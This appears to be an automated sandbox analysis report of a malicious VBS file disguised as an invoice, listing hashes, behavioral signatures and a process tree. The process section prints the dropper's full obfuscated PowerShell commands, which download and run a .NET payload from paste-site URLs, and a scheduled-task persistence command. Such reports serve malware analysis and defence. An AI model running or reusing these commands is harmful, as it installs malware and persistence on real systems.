Resubmissions
12/12/2023, 15:39
231212-s3zdzsfehm 1012/12/2023, 15:32
231212-syk1ssfdgp 1012/12/2023, 15:28
231212-swhgwshad3 10Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231025-en -
resource tags
arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system -
submitted
12/12/2023, 15:28
Static task
static1
Behavioral task
behavioral1
Sample
Billed-report2023xls.vbs
Resource
win7-20231025-en
Behavioral task
behavioral2
Sample
Billed-report2023xls.vbs
Resource
win10v2004-20231130-en
General
-
Target
Billed-report2023xls.vbs
-
Size
135KB
-
MD5
81df0d95d784fd74d88174859e7ab470
-
SHA1
03aed26ac800ea6c492e64fb5fd5ab928b3564ee
-
SHA256
da59502967c26be14e52f229feb80beb4672ad5454eb943969f1da9a21815886
-
SHA512
4b76ec39584ab792f17dee8e435834ac50c3c9285fc30fee5a65b32ebf54fc3e918032caeb7f550f0d5d577faf45a8613ec040c6e318afcc0be1f7a47dbd4689
-
SSDEEP
3072:8DupClYAAAA/AAAA4AAAA4AAAA4AAAA4AAAA4AAAAFsx7YX2ojcAAAA4AAAA4AA3:3
Malware Config
Extracted
https://textbin.net/raw/ezjmofz3s6
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2904 powershell.exe 6 2904 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2068 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2396 powershell.exe 2904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 2904 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2952 wrote to memory of 2164 2952 WScript.exe 28 PID 2952 wrote to memory of 2164 2952 WScript.exe 28 PID 2952 wrote to memory of 2164 2952 WScript.exe 28 PID 2952 wrote to memory of 2068 2952 WScript.exe 30 PID 2952 wrote to memory of 2068 2952 WScript.exe 30 PID 2952 wrote to memory of 2068 2952 WScript.exe 30 PID 2952 wrote to memory of 2396 2952 WScript.exe 32 PID 2952 wrote to memory of 2396 2952 WScript.exe 32 PID 2952 wrote to memory of 2396 2952 WScript.exe 32 PID 2396 wrote to memory of 2904 2396 powershell.exe 34 PID 2396 wrote to memory of 2904 2396 powershell.exe 34 PID 2396 wrote to memory of 2904 2396 powershell.exe 34 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /tn mi /f2⤵PID:2164
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn mi /tr "C:\Users\Admin\AppData\Local\Temp\mi.vbs" /sc minute /mo mi2⤵
- Creates scheduled task(s)
PID:2068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $dgUdYL = 'J▒Bu▒Hg▒d▒Bv▒Ho▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒B3▒G0▒Z▒B0▒H▒▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HY▒ZQBi▒Gg▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwB0▒GU▒e▒B0▒GI▒aQBu▒C4▒bgBl▒HQ▒LwBy▒GE▒dw▒v▒GU▒egBq▒G0▒bwBm▒Ho▒MwBz▒DY▒Jw▒p▒C▒▒KQ▒g▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dgBl▒GI▒a▒▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒TQBh▒HI▒YQBj▒GE▒aQBi▒G8▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒TQBz▒HE▒QgBJ▒GI▒WQ▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒w▒C8▒d▒BU▒FM▒VQBY▒C8▒Z▒▒v▒GU▒ZQ▒u▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Hc▒bQBk▒HQ▒c▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒bgB4▒HQ▒bwB6▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $dgUdYL.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs');powershell -command $KByHL;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$nxtoz = '034';$wmdtp = 'C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs';[Byte[]] $nvebh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) );[system.AppDomain]::CurrentDomain.Load($nvebh).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/tTSUX/d/ee.etsap//:sptth' , $wmdtp , '____________________________________________-------', $nxtoz, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a7e36bd71df2e0eae44b62ea1fb75df6
SHA12478b074b55dac09321add40b370477dd63daddf
SHA25617e678eaad378c7fe60c0cfdacb9e19d2597a506eae5101aa7407f1fbba9c4d9
SHA512ec70d2810b8db33e78f7cc226c4c44bfdfc4925b534e92965c028db275d108915f04a1d2de86dd905137d9fdda4e133ebf16d5b6b6f4e8904228f33993a4755f